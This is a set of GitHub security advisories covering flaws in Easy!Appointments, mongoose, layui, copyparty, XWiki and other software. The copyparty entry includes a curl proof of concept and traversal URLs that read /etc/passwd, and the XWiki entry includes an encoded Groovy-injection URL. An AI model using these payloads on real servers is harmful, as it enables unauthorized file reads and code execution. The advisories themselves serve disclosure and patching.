Source
ghsa
Easy!Appointments 1.4.3 and prior has an Improper Access Control vulnerability. This issue is patched at commit b37b46019553089db4f22eb2fe998bca84b2cb64 and anticipated to be part of version 1.5.0.
Prototype Pollution in GitHub repository automattic/mongoose prior to 7.3.3, 6.11.3, and 5.13.20.
A vulnerability classified as problematic was found in layui up to v2.8.0-rc.16. It affects an unknown part of the HTML Attribute Handler component. Manipulation of the argument title leads to cross-site scripting, and the attack can be initiated remotely. Upgrading to version 2.8.0 addresses this issue; it is recommended to upgrade the affected component. The identifier VDB-234237 was assigned to this vulnerability.
Unrestricted Upload of File with Dangerous Type in GitHub repository admidio/admidio prior to 4.2.10.
CleverTap Cordova Plugin version 2.6.2 allows a remote attacker to execute JavaScript code in any application that is opened via a specially constructed deeplink. This is possible because the plugin does not correctly validate the data coming from deeplinks before using it.
rswag before 2.10.1 allows remote attackers to read arbitrary JSON and YAML files via directory traversal, because rswag-api can expose a file that is not the OpenAPI (or Swagger) specification file of a project.
### Summary

Path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. Tested in Debian Linux.

### Details

Steps to reproduce:

1. Install the software: `python3 -m pip install --user -U copyparty`
2. Execute using the default config: `copyparty`
3. Execute the PoC curl command
4. The `/etc/passwd` file of the remote server is accessible.

### PoC

```bash
curl -i -s -k -X GET 'http://172.19.1.2:3923/.cpr/%2Fetc%2Fpasswd'
```

Additional examples:

http://172.19.4.2:3923/.cpr/a/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://172.19.4.2:3923/.cpr/deps/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

### Checking for exposure

If copyparty is running behind a reverse proxy, you can check the access logs for traces of attacks by grepping your access...
### Impact

Passing _callable strings_ (i.e. `system`) caused the function to be executed.

### Patches

Fixed in [v0.2.1](https://github.com/zenstruck/collection/releases/tag/v0.2.1).

### Workarounds

Do not allow passing user strings to `EntityRepository::find()` or `query()`.

### References

[Fix commit](https://github.com/zenstruck/collection/commit/f4b1c488206e1b1581b06fcd331686846f13f19c).
### Impact

An attacker could modify the window title via a certain character escape sequence and then insert it back into the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.

### Credit

These bugs were found and disclosed by David Leadbeater <dgl@dgl.cx> (@dgl at Github.com).

### Patches

Fixed in version ce596e0dc8cdb288bc7ed5c6a59011ee3a8dc171

### Workarounds

There are no workarounds available.

### References

Similar exploits to this existed in the past, for terminal emulators:

https://nvd.nist.gov/vuln/detail/CVE-2003-0063
https://nvd.nist.gov/vuln/detail/CVE-2008-2383

Additional background and information is also available:

https://marc.info/?l=bugtraq&m=104612710031920&w=2
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030
### Impact

Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to a possible privilege escalation from view right on that document to programming rights; in other words, it is possible to execute arbitrary script macros, including Groovy and Python macros, that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload.

It is possible to check if an existing installation is vulnerable by opening `<xwiki-host>/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view`, where `<xwiki-host>` is the URL of the XWiki installation. The expected result is two list items with "Edit this skin" and "Test this skin" without any furthe...